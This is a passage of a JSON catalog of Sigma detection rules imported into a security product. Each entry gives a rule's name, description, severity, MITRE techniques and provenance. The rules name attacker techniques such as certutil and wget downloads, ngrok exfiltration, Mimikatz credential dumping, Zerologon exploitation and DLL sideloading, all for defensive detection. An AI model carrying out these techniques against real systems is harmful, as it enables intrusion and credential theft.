"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" } }, { "id": "sigmahq-sigma-17e53739-a1fc-4a62-b1b9-87711c2d5e44", "type": 
"detection", "name": "Python Function Execution Security Warning Disabled In Excel - Registry", "description": "Detects changes to the registry value \"PythonFunctionWarnings\" that would prevent any warnings or alerts from showing when Python functions are about to be executed.\nThreat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-function-execution-security-warning-disabled-in-excel-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "17e53739-a1fc-4a62-b1b9-87711c2d5e44", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_disable_python_security_warnings.yml" } }, { "id": "sigmahq-sigma-17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35", "type": "detection", "name": "Suspicious File Download From IP Via Wget.EXE", "description": "Detects potentially suspicious file downloads directly from IP addresses using Wget.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-download-from-ip-via-wget-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wget_download_direct_ip.yml" } }, { "id": "sigmahq-sigma-180c7c5c-d64b-4a63-86e9-68910451bc8b", "type": "detection", "name": "Potential File Download Via MS-AppInstaller Protocol Handler", "description": "Detects usage of the \"ms-appinstaller\" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE\nThe downloaded files are temporarily stored in \":\\Users\\%username%\\AppData\\Local\\Packages\\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\\AC\\INetCache\\\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-file-download-via-ms-appinstaller-protocol-handler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "180c7c5c-d64b-4a63-86e9-68910451bc8b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml" } }, { "id": "sigmahq-sigma-1816994b-42e1-4fb1-afd2-134d88184f71", "type": "detection", "name": "PowerShell Base64 Encoded WMI Classes", "description": "Detects calls to base64 encoded WMI classes such as \"Win32_ShadowCopy\", \"Win32_ScheduledJob\", etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-base64-encoded-wmi-classes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1816994b-42e1-4fb1-afd2-134d88184f71", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml" } }, { "id": "sigmahq-sigma-18249279-932f-45e2-b37a-8925f2597670", "type": "detection", "name": "Process Initiated Network Connection To Ngrok Domain", "description": "Detects an executable initiating a network connection to \"ngrok\" domains.\nAttackers have been seen using \"ngrok\" to store their second stage payloads and malware.\nWhile communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or an additional download.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1572", "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-initiated-network-connection-to-ngrok-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18249279-932f-45e2-b37a-8925f2597670", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/network_connection/net_connection_win_domain_ngrok.yml" } }, { "id": "sigmahq-sigma-185d7418-f250-42d0-b72e-0c8b70661e93", "type": "detection", "name": "Suspicious Diantz Download and Compress Into a CAB File", "description": "Download and compress a remote file and store it in a cab file on local machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-diantz-download-and-compress-into-a-cab-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "185d7418-f250-42d0-b72e-0c8b70661e93", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml" } }, { "id": "sigmahq-sigma-18749301-f1c5-4efc-a4c3-276ff1f5b6f8", "type": "detection", "name": "Use of VSIISExeLauncher.exe", "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-vsiisexelauncher-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml" } }, { "id": "sigmahq-sigma-1883444f-084b-419b-ac62-e0d0c5b3693f", "type": "detection", "name": "Suspicious Connection to Remote Account", "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1110.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-connection-to-remote-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1883444f-084b-419b-ac62-e0d0c5b3693f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml" } }, { "id": "sigmahq-sigma-18988e1b-9087-4f8a-82fe-0414dce49878", "type": "detection", "name": "Execute Code with Pester.bat as Parent", "description": "Detects code execution via Pester.bat (Pester - PowerShell module for testing)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", 
"tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execute-code-with-pester-bat-as-parent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18988e1b-9087-4f8a-82fe-0414dce49878", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_pester.yml" } }, { "id": "sigmahq-sigma-189e3b02-82b2-4b90-9662-411eb64486d4", "type": "detection", "name": "Potential Invoke-Mimikatz PowerShell Script", "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-invoke-mimikatz-powershell-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "189e3b02-82b2-4b90-9662-411eb64486d4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml" } }, { "id": "sigmahq-sigma-18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", "type": "detection", "name": "Buffer Overflow Attempts", "description": "Detects buffer overflow attempts in Unix system log files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", 
"category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/buffer-overflow-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_buffer_overflows.yml" } }, { "id": "sigmahq-sigma-18b88d08-d73e-4f21-bc25-4b9892a4fdd0", "type": "detection", "name": "PST Export Alert Using eDiscovery Alert", "description": "Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pst-export-alert-using-ediscovery-alert.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18b88d08-d73e-4f21-bc25-4b9892a4fdd0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_pst_export_alert.yml" } }, { "id": "sigmahq-sigma-18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", "type": "detection", "name": "Sysmon Channel Reference Deletion", "description": "Potential threat actor tampering with Sysmon 
manifest and eventually disabling it", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-channel-reference-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" } }, { "id": "sigmahq-sigma-18ee686c-38a3-4f65-9f44-48a077141f42", "type": "detection", "name": "Uncommon Extension Shim Database Installation Via Sdbinst.EXE", "description": "Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-extension-shim-database-installation-via-sdbinst-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18ee686c-38a3-4f65-9f44-48a077141f42", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sdbinst_susp_extension.yml" } }, { "id": "sigmahq-sigma-18f2065c-d36c-464a-a748-bcf909acb2e3", "type": "detection", "name": "Wow6432Node Classes Autorun Keys Modification", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wow6432node-classes-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18f2065c-d36c-464a-a748-bcf909acb2e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" } }, { "id": "sigmahq-sigma-18f37338-b9bd-4117-a039-280c81f7a596", "type": "detection", "name": "Zerologon Exploitation Using Well-known Tools", "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1210" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/zerologon-exploitation-using-well-known-tools.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "18f37338-b9bd-4117-a039-280c81f7a596", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" } }, { "id": "sigmahq-sigma-1908fcc1-1b92-4272-8214-0fbaf2fa5163", "type": "detection", "name": "Malicious DLL File Dropped in the Teams or OneDrive Folder", "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Teams applications reside.\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (\"iphlpapi.dll\") is sideloaded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-dll-file-dropped-in-the-teams-or-onedrive-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml" } }, { "id": "sigmahq-sigma-19128e5e-4743-48dc-bd97-52e5775af817", "type": "detection", "name": "Azure AD Account Credential Leaked", "description": "Indicates that the user's valid credentials have been leaked.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1589" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/azure-ad-account-credential-leaked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "19128e5e-4743-48dc-bd97-52e5775af817", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_leaked_credentials.yml" } }, { "id": "sigmahq-sigma-192a0330-c20b-4356-90b6-7b7049ae0b87", "type": "detection", "name": "Successful Overpass the Hash Attempt", "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1550.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/successful-overpass-the-hash-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "192a0330-c20b-4356-90b6-7b7049ae0b87", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_overpass_the_hash.yml" } }, { "id": "sigmahq-sigma-193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "type": "detection", "name": "Xwizard.EXE Execution From Non-Default Location", "description": "Detects the execution of Xwizard tool from a non-default directory.\nWhen executed from a non-default directory, this utility can be abused in order to side load a custom 
version of \"xwizards.dll\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/xwizard-exe-execution-from-non-default-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_xwizard_execution_non_default_location.yml" } }, { "id": "sigmahq-sigma-195626f3-5f1b-4403-93b7-e6cfd4d6a078", "type": "detection", "name": "Suspicious SSL Connection", "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1573" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-ssl-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml" } }, { "id": 
"sigmahq-sigma-195c1119-ef07-4909-bb12-e66f5e07bf3c", "type": "detection", "name": "Download from Suspicious Dyndns Hosts", "description": "Detects download of certain file types from hosts with dynamic DNS names (selected list)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1568" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/download-from-suspicious-dyndns-hosts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "195c1119-ef07-4909-bb12-e66f5e07bf3c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_download_susp_dyndns.yml" } }, { "id": "sigmahq-sigma-195e1b9d-bfc2-4ffa-ab4e-35aef69815f8", "type": "detection", "name": "Bitbucket Full Data Export Triggered", "description": "Detects when full data export is attempted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1213.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-full-data-export-triggered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "195e1b9d-bfc2-4ffa-ab4e-35aef69815f8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/application/bitbucket/audit/bitbucket_audit_full_data_export_triggered.yml" } }, { "id": "sigmahq-sigma-198effb6-6c98-4d0c-9ea3-451fa143c45c", "type": "detection", "name": "Run Once Task Execution as Configured in Registry", "description": "This rule detects the execution of Run Once task as configured in the registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/run-once-task-execution-as-configured-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "198effb6-6c98-4d0c-9ea3-451fa143c45c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_runonce_execution.yml" } }, { "id": "sigmahq-sigma-19951c21-229d-4ccb-8774-b993c3ff3c5c", "type": "detection", "name": "Okta API Token Created", "description": "Detects when a API token is created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-api-token-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "19951c21-229d-4ccb-8774-b993c3ff3c5c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/identity/okta/okta_api_token_created.yml" } }, { "id": "sigmahq-sigma-19aa4f58-94ca-45ff-bc34-92e533c0994a", "type": "detection", "name": "Suspicious User-Agents Related To Recon Tools", "description": "Detects known suspicious (default) user-agents related to scanning/recon tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-user-agents-related-to-recon-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "19aa4f58-94ca-45ff-bc34-92e533c0994a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_susp_useragents.yml" } }, { "id": "sigmahq-sigma-19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", "type": "detection", "name": "Python SQL Exceptions", "description": "Generic rule for SQL exceptions in Python according to PEP 249", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/python-sql-exceptions.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/python/app_python_sql_exceptions.yml" } }, { "id": 
"sigmahq-sigma-19b041f6-e583-40dc-b842-d6fa8011493f", "type": "detection", "name": "HackTool Named File Stream Created", "description": "Detects the creation of a named file stream with the imphash of a well-known hack tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-named-file-stream-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "19b041f6-e583-40dc-b842-d6fa8011493f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_hktl_generic_download.yml" } }, { "id": "sigmahq-sigma-19b08b1c-861d-4e75-a1ef-ea0c1baf202b", "type": "detection", "name": "Suspicious Download Via Certutil.EXE", "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-download-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_download.yml" } }, { "id": "sigmahq-sigma-19bf6fdb-7721-4f3d-867f-53467f6a5db6", "type": "detection", "name": "Communication To Ngrok Tunneling Service - Linux", "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1568.002", "T1572", "T1090", "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/communication-to-ngrok-tunneling-service-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml" } }, { "id": "sigmahq-sigma-1a0a2ff1-611b-4dac-8216-8a7b47c618a6", "type": "detection", "name": "Invoke-Obfuscation Via Use Clip - Security", "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": 